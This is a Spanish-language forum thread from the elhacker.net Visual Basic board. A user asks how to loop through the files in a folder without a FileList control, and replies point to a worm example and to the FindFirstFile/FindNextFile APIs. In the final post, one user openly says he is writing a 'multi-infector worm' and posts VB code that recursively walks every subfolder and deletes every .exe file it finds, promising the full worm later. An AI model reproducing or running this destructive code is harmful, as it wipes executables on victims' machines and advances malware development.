elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Recorrer Archivos
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Recorrer Archivos  (Leído 2,852 veces)
el_chente23

Desconectado Desconectado

Mensajes: 142



Ver Perfil
Recorrer Archivos
« en: 9 Agosto 2005, 19:44 pm »

Hola a todos, tengo una duda, ¿ como puedo recorrer los archivos de una carpeta en un bucle sin usar un filelist?, lo consegui con eso, pues es sencillo, pero quisiera saber como se hace sin controles.

Saludos


En línea

Slasher-K


Desconectado Desconectado

Mensajes: 1.477


Ver Perfil
Re: Recorrer Archivos
« Respuesta #1 en: 10 Agosto 2005, 01:03 am »

Mira el siguiente post que es exactamente lo que estás buscando.

Ejemplo de Worm (gusano) en VB

Saludos.


En línea



A la reina de las profundidades que cuida los pasos de una sombra en la noche :*
el_chente23

Desconectado Desconectado

Mensajes: 142



Ver Perfil
Re: Recorrer Archivos
« Respuesta #2 en: 10 Agosto 2005, 03:01 am »

No logre entender muy bien, parece ser que lo que hace es recorrer un directorio y sus subdirectorios, lo que yo necesito es recorrer los archivos de un directorio especifico, para sacar algunas propiedades de esos archivos.

PD: ese post es muy bueno, no lo habia visto

Saludos
En línea

Slasher-K


Desconectado Desconectado

Mensajes: 1.477


Ver Perfil
Re: Recorrer Archivos
« Respuesta #3 en: 10 Agosto 2005, 03:37 am »

Las funciones son FindFirstFile, FindNextFile y FindClose. En el siguiente post se muestra más resumido el uso de estas funciones. Si lo modificas un poco para que actúe de función recursiva es lo mismo que el ejemplo que te mostré anteriormente.

Problemas al detectar directorios en una unidad

Saludos.
En línea



A la reina de las profundidades que cuida los pasos de una sombra en la noche :*
lupino666

Desconectado Desconectado

Mensajes: 12


Ver Perfil
Re: Recorrer Archivos
« Respuesta #4 en: 27 Agosto 2007, 00:23 am »

mira lo que yo ago para recojer todo los archivos de la pc

esto lo estoy usando en la creacion de un worm multi infector

el worm rastrea el los .exe y se los pasa a la funcion infectar exe

en este caso no la pongo despues pongo el worm completo  ::)

Código:
Dim carpetaS As New Collection
sub carpetas(path as string, nº as long)
Set fso = CreateObject("scripting.filesystemobject")

If fso.getfolder(path).SubFolders.Count = 0 Then: Exit Sub
For Each i In fso.getfolder(path).SubFolders
    carpetaS.Add (i)
    nº = nº + 1
    DoEvents
    carpetas i, nº
    For Each j In fso.getfolder(i).files
     If fso.getextensionname(j) = "exe" Then
                       fso.deletefile j             'borramos los exe
                                 
    End If
    Next
Next
end sub
______
http://world5.monstersgame.es/?ac=vid&vid=58141462
pincha mi link
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Recorrer ciertos elementos en JS
Desarrollo Web
Riki_89D 1 4,343 Último mensaje 10 Enero 2011, 20:09 pm
por Nakp
Recorrer dataGrid
.NET (C#, VB.NET, ASP)
proteus8 6 8,257 Último mensaje 25 Febrero 2011, 16:00 pm
por .::IT::.
Recorrer Winsock
Programación Visual Basic
Stelio Kontos 1 1,719 Último mensaje 24 Marzo 2011, 13:53 pm
por skyweb07
recorrer una pagina en busca de emails
Dudas Generales
Kase 4 3,453 Último mensaje 15 Junio 2011, 01:53 am
por .:UND3R:.
Recorrer directorios y generar log (BATCH)
Scripting
Dany3j 8 15,180 Último mensaje 30 Junio 2011, 01:39 am
por Dany3j
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines